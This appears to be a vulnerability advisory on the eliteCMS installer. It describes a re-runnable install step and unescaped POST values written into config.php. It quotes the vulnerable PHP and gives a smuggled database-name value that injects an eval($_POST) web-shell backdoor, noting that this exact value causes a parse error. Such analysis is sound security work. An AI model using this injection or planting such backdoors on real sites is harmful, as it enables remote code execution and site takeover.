eliteCMS's installer is not locked down after installation completes, so an attacker can re-run the installation simply by requesting the installer URL.

Another vulnerability is that the installer can be made to write a one-line PHP backdoor straight into admin/includes/config.php.
Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // The four DB_* values come straight out of $_SESSION and are interpolated
    // into PHP source text with no escaping at all.
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= " die(\"Database connection failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= " die(\"Database select failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "?>\n";

    // config.php is opened for writing on every step-4 request; nothing checks
    // whether the site has already been installed.
    $writer = fopen($file, 'w');
...

Now look at where those session values come from:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are copied from the POST body without any validation.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

the one-line backdoor is written into /admin/includes/config.php. After the installer's string interpolation the generated line reads:

define("DB_NAME", ""?><?php eval($_POST[c]);?><?php");

One caveat a tester should keep in mind: PHP compiles the whole file before it executes any of it, and `?>` acts as a statement terminator, so this particular value cuts the define(...) call short and produces a parse error in config.php. That breaks the site but does not run the eval; whatever is injected has to leave the file syntactically valid for the backdoor to actually execute. The root cause is the same for both issues: the installer neither locks itself after a completed install nor escapes what it writes into PHP source.